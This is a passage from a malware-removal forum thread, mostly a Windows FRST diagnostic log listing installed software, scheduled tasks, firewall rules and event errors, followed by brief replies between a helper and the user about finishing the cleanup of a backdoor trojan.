Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
Mozilla Firefox 47.0.1 (x86 pt-PT) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 pt-PT)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MPC-HC 1.7.10 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.10 - MPC-HC Team)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.9.2 - Notepad++ Team)
NVIDIA Controlador gráfico 368.69 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 368.69 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA O controlador de HD Audio 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation)
NVIDIA O software do sistema PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
Origin (HKLM-x32\...\Origin) (Version: 9.12.1.43352 - Electronic Arts, Inc.)
Painel de controlo da NVIDIA 368.69 (Version: 368.69 - NVIDIA Corporation) Hidden
Prerequisites for SSDT  (HKLM-x32\...\{21373064-AD95-48DB-A32E-0D9E08EF7355}) (Version: 12.0.2000.8 - Microsoft Corporation)
Prerequisites for SSDT  (HKLM-x32\...\{B7E94916-7AE6-4F7F-A377-7A410A42BA19}) (Version: 13.0.1601.5 - Microsoft Corporation)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
SafeZone Stable 1.48.2066.114 (x32 Version: 1.48.2066.114 - Avast Software) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Skype™ 7.25 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.25.106 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.)
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2876588207-1483049806-666444280-1002_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\User not found\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll ()
CustomCLSID: HKU\S-1-5-21-2876588207-1483049806-666444280-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\User not found\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2876588207-1483049806-666444280-1002_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {050F2B79-9879-4C6C-9791-9A59F8BA9F0E} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe
Task: {2B46C540-13C7-4223-A9E8-B151AEC07320} - System32\Tasks\SafeZone scheduled Autoupdate 1468434428 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-06-17] (Avast Software)
Task: {5E81E37A-2B8B-4582-B31A-19A2600373BF} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-07-12] (Adobe Systems Incorporated)
Task: {844F311A-7390-4A90-8840-366EB7ACAE34} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-07-13] (AVAST Software)
Task: {DE63146F-5DE7-4D7E-BE64-D85FD5BFAE63} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-07-13] (AVAST Software)
Task: {E6FE1A8C-196C-49EC-AFE7-28CEB3322CC1} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2876588207-1483049806-666444280-1002 => C:\Users\User not found\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2016-06-16] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2016-07-11 18:14 - 2016-06-29 19:37 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-06-23 21:21 - 2016-06-23 21:38 - 00075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2016-07-11 18:15 - 2016-06-29 23:44 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-07-13 19:24 - 2016-07-13 19:24 - 00146232 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-07-13 19:24 - 2016-07-13 19:24 - 00479288 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-07-18 10:33 - 2016-07-18 10:33 - 03000832 _____ () C:\Program Files\AVAST Software\Avast\defs\16071800\algo.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-07-13 19:24 - 2016-07-13 19:24 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2013-08-22 14:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2876588207-1483049806-666444280-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\User not found\Desktop\ktm_990_super_duke-1920x1080.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\StartupApproved\Run: => "Steam"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{E37E6571-9825-4325-B6B7-2AB99CCDB955}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4F08C9F2-CC01-4139-BE9D-CF2CDFEA42ED}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0298D77C-C35B-4C87-BE10-7585B2899A71}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{02CD9553-153A-46AA-8491-D978D7B79E40}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C38EDE32-01C9-4161-9CFF-B782E96FF5E9}] => (Allow) C:\Users\User not found\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{0A2240BB-D446-45FE-89BC-3115B09887DC}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{F044EFC4-F243-46EB-BF30-ACCF9134E575}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{EA4F1002-5D19-435B-BD25-46F3B8A3CE37}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{650D0A2F-D805-462D-8ACB-1390A909D387}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{EA49333A-ADA2-4AEA-8A2F-1D18D9AC2E38}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{4743703C-2692-495C-B384-479E84A8F05A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{4FB6491A-4506-4E08-B15C-5DF53E582A0B}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{0CDAC64E-3D63-4D01-84CA-F68229F571A2}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{2186CDBA-F2FF-403E-B0DA-6C10165B6F71}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{F370ADF2-FA62-4B98-90E7-B3AB1F4BD746}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{98431B85-8EBF-49EE-9C51-B8EF7231D9C3}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{61EAC859-1A43-4545-9207-37144D3CBE92}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{C9783186-8C34-4E33-9B1D-CCB63C134E54}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{CBEA8C58-5503-421B-BD4D-761814CF609E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{A9E5CBF0-E0EA-4EB7-A3B8-E21D0EFB4FE2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{542D013C-5031-4FA4-BA2E-66AF36AA8A4A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{85A6F4B3-3854-44EF-AF6D-5A9AD2627FDD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{A6B398C6-2FD4-4F27-997A-04FF98D16674}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C8BFF980-5F3B-43CE-A980-1F97D4E629BE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{205EE810-DC29-4E70-AC88-B70C1475171C}] => (Allow) C:\Users\User not found\AppData\Local\Microsoft\OneDrive\OneDrive.exe

==================== Restore Points =========================

12-07-2016 18:55:37 Ponto de Verificação Agendado
13-07-2016 19:26:37 ASU_MSI_TRAN
16-07-2016 12:48:37 Removed Vegas Pro 13.0 (64-bit)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (07/18/2016 10:44:01 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.

Error: (07/18/2016 10:43:59 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.

Error: (07/18/2016 10:43:55 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.

Error: (07/18/2016 10:43:52 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.

Error: (07/18/2016 10:36:58 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.

Error: (07/18/2016 10:36:19 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.

Error: (07/18/2016 10:36:17 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.

Error: (07/18/2016 10:36:13 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.

Error: (07/17/2016 11:01:06 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.

Error: (07/17/2016 11:01:05 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Falha na geração do contexto de ativação para "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest1". Erro no ficheiro de política ou manifesto C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest2 na linha C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest3.
Uma versão de componente necessária para a aplicação está em conflito com outra versão de componente já ativa.
Os componentes em conflito são:
Componente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8.manifest.
Componente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_a9ec6aab013aafee.manifest.


System errors:
=============
Error: (07/18/2016 01:49:24 PM) (Source: disk) (EventID: 11) (User: )
Description: O controlador detetou um erro de controlador em \Device\Harddisk2\DR8.

Error: (07/18/2016 03:04:32 AM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}

Error: (07/18/2016 03:04:02 AM) (Source: DCOM) (EventID: 10010) (User: Error)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}

Error: (07/17/2016 11:00:56 PM) (Source: disk) (EventID: 11) (User: )
Description: O controlador detetou um erro de controlador em \Device\Harddisk2\DR4.

Error: (07/17/2016 10:55:54 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: O serviço eapihdrv falhou o arranque devido ao seguinte erro:
%%1275 = O carregamento deste controlador foi bloqueado


Error: (07/17/2016 10:55:54 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\USERNO~1\AppData\Local\Temp\ehdrv.sys

Error: (07/17/2016 10:55:53 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: O serviço eapihdrv falhou o arranque devido ao seguinte erro:
%%1275 = O carregamento deste controlador foi bloqueado


Error: (07/17/2016 10:55:53 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\USERNO~1\AppData\Local\Temp\ehdrv.sys

Error: (07/17/2016 10:55:53 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: O serviço eapihdrv falhou o arranque devido ao seguinte erro:
%%1275 = O carregamento deste controlador foi bloqueado


Error: (07/17/2016 10:55:53 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\USERNO~1\AppData\Local\Temp\ehdrv.sys


==================== Memory info ===========================

Processor: Intel® Core™ i5-3317U CPU @ 1.70GHz
Percentage of memory in use: 45%
Total physical RAM: 5845.53 MB
Available physical RAM: 3196.12 MB
Total Virtual: 6805.54 MB
Available Virtual: 3443.9 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:505.08 GB) (Free:425.45 GB) NTFS
Drive d: (Disco Pessoal) (Fixed) (Total:150 GB) (Free:12.65 GB) NTFS
Drive e: (Disco Local) (Fixed) (Total:250 GB) (Free:15.63 GB) NTFS
Drive h: () (Removable) (Total:0.94 GB) (Free:0.93 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: D4A83735)

Partition: GPT.

========================================================
Disk: 1 (Size: 22.4 GB) (Disk ID: 9F8C219F)

Partition: GPT.

========================================================
Disk: 2 (Size: 964 MB) (Disk ID: 91F72D24)
Partition 1: (Active) - (Size=964 MB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

 

 

 

 

 

 

 

 

 

Thank you so much for the time you spent to help me.



#14 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,773 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:12:18 AM

Posted 18 July 2016 - 09:12 AM

Greetings,

I have to at least make you aware of the potential ramifications of a Backdoor Trojan.

Things are looking pretty good. Are there any remaining issues before I post some cleanup steps and information for you to consider going forward?
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#15 TheGoodGuy

TheGoodGuy
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:08:18 AM

Posted 18 July 2016 - 11:45 AM

No, there aren't any issues






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users